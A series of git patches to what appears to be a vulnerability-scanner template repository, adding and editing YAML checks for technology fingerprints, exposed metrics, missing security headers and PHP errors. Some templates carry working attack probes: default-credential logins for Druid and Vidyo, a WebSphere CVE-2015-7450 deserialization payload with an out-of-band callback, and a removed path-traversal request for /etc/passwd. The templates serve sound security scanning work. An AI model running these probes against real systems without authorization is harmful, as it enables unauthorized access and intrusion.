example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 From 6d5f00b199cde75279d3cb8dd1a31fbf9c34135e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:59:13 +0700 Subject: [PATCH 013/339] Create druid-detect.yaml --- technologies/druid-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/druid-detect.yaml diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml new file mode 100644 index 0000000000..8cdd990c9e --- /dev/null +++ b/technologies/druid-detect.yaml @@ -0,0 +1,23 @@ +id: druid-detect + +info: + name: Druid monitor Detect + author: pikpikcu + severity: info + tags: tech,druid + +requests: + - method: GET + path: + - "{{BaseURL}}/druid/login.html" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "druid monitor" + - type: status + status: + - 200 From 7fcb9bd496adc55967099ee60f7a289cd3bfefd0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 16:02:41 +0700 Subject: [PATCH 014/339] Create druid-default-password.yaml --- .../druid/druid-default-password.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 default-logins/druid/druid-default-password.yaml diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml new file mode 100644 index 0000000000..0696eafd4a --- /dev/null +++ b/default-logins/druid/druid-default-password.yaml @@ -0,0 +1,26 @@ +id: druid-default-password + +info: + name: Druid Default Password + author: pikpikcu + severity: high + tags: druid,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/druid/submitLogin" + - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" + + matchers-condition: and + matchers: + + - type: word + words: + - 'success' + part: body + condition: and + - type: status + status: + - 200 From 38d219be53be404790bf298d7703ff0828794966 Mon Sep 17 00:00:00 2001 From: izn0u Date: Thu, 2 Sep 2021 16:15:34 +0000 Subject: [PATCH 015/339] Added vidyo-super default-creds Template --- default-logins/vidyo/vidyo-super-admin.yaml | 86 +++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 default-logins/vidyo/vidyo-super-admin.yaml diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml new file mode 100644 index 0000000000..d168d2e3e0 --- /dev/null +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -0,0 +1,86 @@ +id: vidyo-Default-Credentials + +info: + name: Vidyo Default Credentials + author: izn0u0 + severity: medium + description: test for default cred super:password + tags: vidyo,default-login + + +requests: + - raw: + - | + GET /super/login.html?lang=en HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 32 + Origin: {{BaseURL}} + DNT: 1 + Connection: close + Referer: http://{{Hostname}}/super/login.html?lang=en + Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en + Upgrade-Insecure-Requests: 1 + + username=super&password=password + + + - | + GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{BaseURL}}/super/login.html?lang=en + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + + + + + + extractors: + - type: regex + name: csrf_tkn + group: 1 + part: body + internal: true + regex: + - 'csrf_tkn=([A-Za-z0-9.-]+)' + + - type: kval + name: session + internal: true + part: header + kval: + - JSESSIONID + + cookie-reuse: true + redirects: true + #matchers-condition: and + matchers: + - type: status + status: + - 200 + + #- type: word + #words: + #- "welcome to" + #part: body + #- type: dsl + #dsl: + #- 'contains(body, "welcome to")' \ No newline at end of file From 223c8ea750502d5db6c323b4196cfb8b0d1e6ba3 Mon Sep 17 00:00:00 2001 From: izn0u <40471524+izn0u@users.noreply.github.com> Date: Thu, 2 Sep 2021 16:43:49 +0000 Subject: [PATCH 016/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 11 +---------- 1 file changed, 1 insertion(+), 10 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index d168d2e3e0..901a75a5b3 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -2,7 +2,7 @@ id: vidyo-Default-Credentials info: name: Vidyo Default Credentials - author: izn0u0 + author: izn0u severity: medium description: test for default cred super:password tags: vidyo,default-login @@ -71,16 +71,7 @@ requests: cookie-reuse: true redirects: true - #matchers-condition: and matchers: - type: status status: - 200 - - #- type: word - #words: - #- "welcome to" - #part: body - #- type: dsl - #dsl: - #- 'contains(body, "welcome to")' \ No newline at end of file From f5153bda65eb5340065c1f91701fb347e4c2cf70 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:02:41 +0530 Subject: [PATCH 017/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 30 +++------------------ 1 file changed, 4 insertions(+), 26 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index 901a75a5b3..dc9e7c8953 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -10,47 +10,25 @@ info: requests: - raw: - - | + - | GET /super/login.html?lang=en HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - - | + + - | POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 32 Origin: {{BaseURL}} - DNT: 1 - Connection: close Referer: http://{{Hostname}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - Upgrade-Insecure-Requests: 1 username=super&password=password - - - | + - | GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}}/super/login.html?lang=en - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - - - extractors: From 601aa39472b51a0a1dd228ada5ddf4592ae5b2bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:03:07 +0530 Subject: [PATCH 018/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index dc9e7c8953..c3b20673bb 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -1,4 +1,4 @@ -id: vidyo-Default-Credentials +id: vidyo-default-credentials info: name: Vidyo Default Credentials From c038ae90abeb0579c3b09419a079816c9c9b38cf Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:05:12 +0530 Subject: [PATCH 019/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index c3b20673bb..0749aa4548 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -30,6 +30,8 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}}/super/login.html?lang=en + cookie-reuse: true + redirects: true extractors: - type: regex @@ -47,9 +49,7 @@ requests: kval: - JSESSIONID - cookie-reuse: true - redirects: true matchers: - - type: status - status: - - 200 + - type: word + words: + - "Vidyo MainSuperAdmin" From ca2963beb63c6cd5e6ae8e935bd6ecd869ec12b5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:15:26 +0530 Subject: [PATCH 020/339] encoding update --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index a28bfc6ead..39d042bfcf 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -27,7 +27,7 @@ requests: rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= From 9fdac495f7582f3c502742cb6ebbd999f97d18fc Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:16:53 +0530 Subject: [PATCH 021/339] more tags --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 39d042bfcf..e27a3e815f 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce + tags: cve,cve2015,websphere,deserialization,rce,oob requests: - raw: From 6e2816be3e9cace2ef5256c46148beeca0f373f1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 20:12:53 +0530 Subject: [PATCH 022/339] Add files via upload --- .../kubernetes-exposed-metrics.yaml | 24 +++++++++++++++++ misconfiguration/node-exporter-metrics.yaml | 27 +++++++++++++++++++ .../overview-kubernetes-resource-report.yaml | 25 +++++++++++++++++ 3 files changed, 76 insertions(+) create mode 100644 misconfiguration/kubernetes-exposed-metrics.yaml create mode 100644 misconfiguration/node-exporter-metrics.yaml create mode 100644 misconfiguration/overview-kubernetes-resource-report.yaml diff --git a/misconfiguration/kubernetes-exposed-metrics.yaml b/misconfiguration/kubernetes-exposed-metrics.yaml new file mode 100644 index 0000000000..f33fd429b0 --- /dev/null +++ b/misconfiguration/kubernetes-exposed-metrics.yaml @@ -0,0 +1,24 @@ +id: kubernetes-exposed-metrics +info: + name: Detect Kubernetes Exposed Metrics + author: pussycat0x + severity: low + description: Information Disclosure of Garbage Collection + tags: kubernetes,exposure, metrics +requests: + - method: GET + path: + - "{{BaseURL}}:8080/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "namespace" + - "HELP" + - "TYPE" + - "kube" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/node-exporter-metrics.yaml b/misconfiguration/node-exporter-metrics.yaml new file mode 100644 index 0000000000..5320578547 --- /dev/null +++ b/misconfiguration/node-exporter-metrics.yaml @@ -0,0 +1,27 @@ +id: node-exporter-metrics +info: + name: Detect Node Exporter Metrics + author: pussycat0x + severity: low + description: Information Disclosure of Garbage Collection + tags: node,exposure, metrics +requests: + - method: GET + path: + - "{{BaseURL}}:9100/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "go_goroutines" + - "HELP" + - "gauge" + - "node_cooling_device" + - "node_network" + - "boot" + - "TYPE go_goroutines gauge" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/overview-kubernetes-resource-report.yaml new file mode 100644 index 0000000000..76c3dbd457 --- /dev/null +++ b/misconfiguration/overview-kubernetes-resource-report.yaml @@ -0,0 +1,25 @@ +id: overview-kubernetes-resource-report +info: + name: Detect Overview Kubernetes Resource Report + author: pussycat0x + severity: medium + description: Information Disclosure of Kubernetes Resource Report + tags: Kubernetes,exposure +requests: + - method: GET + path: + - "{{BaseURL}}:9100/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Overview - Kubernetes Resource Report" + - "Overview - Kubernetes Resource Report" + - "Pods" + - "Worker Nodes" + - "Applications" + condition: and + - type: status + status: + - 200 \ No newline at end of file From c91fbf2af480cfa7e4ea6d9cdc2a56a73efb9c16 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 20:47:35 +0530 Subject: [PATCH 023/339] Add files via upload --- technologies/abyss-web-server.yaml | 21 ++++++++++++++++++ .../kubernetes-enterprise-manager.yaml | 21 ++++++++++++++++++ technologies/mirantis-kubernetes-engine.yaml | 21 ++++++++++++++++++ technologies/oracle-iplanet-web-server.yaml | 22 +++++++++++++++++++ 4 files changed, 85 insertions(+) create mode 100644 technologies/abyss-web-server.yaml create mode 100644 technologies/kubernetes-enterprise-manager.yaml create mode 100644 technologies/mirantis-kubernetes-engine.yaml create mode 100644 technologies/oracle-iplanet-web-server.yaml diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml new file mode 100644 index 0000000000..2e65c1eef3 --- /dev/null +++ b/technologies/abyss-web-server.yaml @@ -0,0 +1,21 @@ +id: abyss-web-server-detect +info: + name: Detect Abyss Web Server + author: pussycat0x + severity: info + tags: tech + reference: app="Abyss-Web-Server" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Abyss Web Server" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes-enterprise-manager.yaml new file mode 100644 index 0000000000..ed6241c0f9 --- /dev/null +++ b/technologies/kubernetes-enterprise-manager.yaml @@ -0,0 +1,21 @@ +id: kubernetes-enterprise-manager +info: + name: Detect Kubernetes Enterprise Manager + author: pussycat0x + severity: info + tags: tech + reference: app="Kubernetes-Enterprise-Manager" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Kubernetes Enterprise Manager" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/mirantis-kubernetes-engine.yaml b/technologies/mirantis-kubernetes-engine.yaml new file mode 100644 index 0000000000..9988ad9a0f --- /dev/null +++ b/technologies/mirantis-kubernetes-engine.yaml @@ -0,0 +1,21 @@ +id: mirantis-kubernetes-engine +info: + name: Detect Mirantis Kubernetes Engine + author: pussycat0x + severity: info + tags: tech + reference: app="Mirantis-Kubernetes-Engine" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mirantis Kubernetes Engine" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle-iplanet-web-server.yaml new file mode 100644 index 0000000000..abdc9fc14e --- /dev/null +++ b/technologies/oracle-iplanet-web-server.yaml @@ -0,0 +1,22 @@ +id: oracle-iplanet-web-server-detect +info: + name: Detect Oracle-iPlanet-Web-Server + author: pussycat0x + severity: info + tags: tech + reference: app="Oracle-iPlanet-Web-Server -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Oracle iPlanet Web Server 7.0" + - "Oracle iPlanet Web Server" + condition: and + - type: status + status: + - 200 \ No newline at end of file From ac4bce9ca58ceecde41e9d999d4008d740bd17a2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 11:28:42 -0500 Subject: [PATCH 024/339] Update php-errors.yaml Made better through use of regex extractors. More useful information is displayed on-screen. --- misconfiguration/php-errors.yaml | 47 ++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..11e7defb9f 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,31 +2,36 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' From 6ba8cb040d21c98c8441d29de0e5db35c3fa2e5b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 22:23:59 +0530 Subject: [PATCH 025/339] Update overview-kubernetes-resource-report.yaml --- misconfiguration/overview-kubernetes-resource-report.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/overview-kubernetes-resource-report.yaml index 76c3dbd457..34d9dca54d 100644 --- a/misconfiguration/overview-kubernetes-resource-report.yaml +++ b/misconfiguration/overview-kubernetes-resource-report.yaml @@ -8,13 +8,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}:9100/metrics" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word part: body words: - - "Overview - Kubernetes Resource Report" - "Overview - Kubernetes Resource Report" - "Pods" - "Worker Nodes" @@ -22,4 +21,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From d27dadb79ef4901962673a90427d47fe132911a9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:24:11 +0530 Subject: [PATCH 026/339] updated matchers --- .../http-missing-security-headers.yaml | 146 ++++++++++-------- 1 file changed, 80 insertions(+), 66 deletions(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 350fcbe9db..97d80d6c05 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -11,103 +11,117 @@ requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: or matchers: - - type: word - name: "Strict-Transport-Security" - words: - - "Strict-Transport-Security" - part: header + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" negative: true - - type: word - name: "Content-Security-Policy" - words: - - "Content-Security-Policy" part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" negative: true - - type: word - name: "X-Frame-Options" - words: - - "X-Frame-Options" part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" negative: true - - type: word - name: "X-Content-Type-Options" - words: - - "X-Content-Type-Options" part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" negative: true - - type: word - name: "X-Permitted-Cross-Domain-Policies" - words: - - "X-Permitted-Cross-Domain-Policies" part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" negative: true - - type: word - name: "Referrer-Policy" - words: - - "Referrer-Policy" part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" negative: true - - type: word - name: "Clear-Site-Data" - words: - - "Clear-Site-Data" part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" negative: true - - type: word - name: "Cross-Origin-Embedder-Policy" - words: - - "Cross-Origin-Embedder-Policy" part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" negative: true - - type: word - name: "Cross-Origin-Opener-Policy" - words: - - "Cross-Origin-Opener-Policy" part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" negative: true - - type: word - name: "Cross-Origin-Resource-Policy" - words: - - "Cross-Origin-Resource-Policy" part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" negative: true - - type: word - name: "Access-Control-Allow-Origin" - words: - - "Access-Control-Allow-Origin" part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" negative: true - - type: word - name: "Access-Control-Allow-Credentials" - words: - - "Access-Control-Allow-Credentials" part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" negative: true - - type: word - name: "Access-Control-Expose-Headers" - words: - - "Access-Control-Expose-Headers" part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" negative: true - - type: word - name: "Access-Control-Max-Age" - words: - - "Access-Control-Max-Age" part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" negative: true - - type: word - name: "Access-Control-Allow-Methods" - words: - - "Access-Control-Allow-Methods" part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" negative: true - - type: word - name: "Access-Control-Allow-Headers" - words: - - "Access-Control-Allow-Headers" part: header - negative: true + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file From da27280259b5e870d1ed11bc12e30ff6500b0621 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:26:23 +0530 Subject: [PATCH 027/339] Added stop-at-first-match --- default-logins/abb/cs141-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index cb51eede2c..531ed5ae2d 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,7 @@ requests: {"userName":"guest","password":"guest"} + stop-at-first-match: true matchers-condition: and matchers: - type: word From f6c72769cee9a58a4cb3e110418008c0a8d805ba Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 3 Sep 2021 22:29:55 +0530 Subject: [PATCH 028/339] temporary moving to another branch --- cves/2020/CVE-2020-11420.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml deleted file mode 100644 index be676408b1..0000000000 --- a/cves/2020/CVE-2020-11420.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-11420 - -info: - name: ABB UPS Adapter CS141 – Path traversal - author: socketz - severity: medium - description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path - Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, - and then you can exploit it, before that, you should wait. - reference: - - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf - tags: cve,cve2020,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" - - headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file From 32fed54169da875c38d139b61143aa7344234ae9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:35:58 +0530 Subject: [PATCH 029/339] removing duplicate templates and few updates --- miscellaneous/missing-csp.yaml | 17 ----------------- miscellaneous/missing-hsts.yaml | 17 ----------------- .../missing-x-content-type-options.yaml | 18 ------------------ miscellaneous/missing-x-frame-options.yaml | 19 ------------------- .../http-missing-security-headers.yaml | 4 ++-- 5 files changed, 2 insertions(+), 73 deletions(-) delete mode 100644 miscellaneous/missing-csp.yaml delete mode 100644 miscellaneous/missing-hsts.yaml delete mode 100644 miscellaneous/missing-x-content-type-options.yaml delete mode 100644 miscellaneous/missing-x-frame-options.yaml diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - 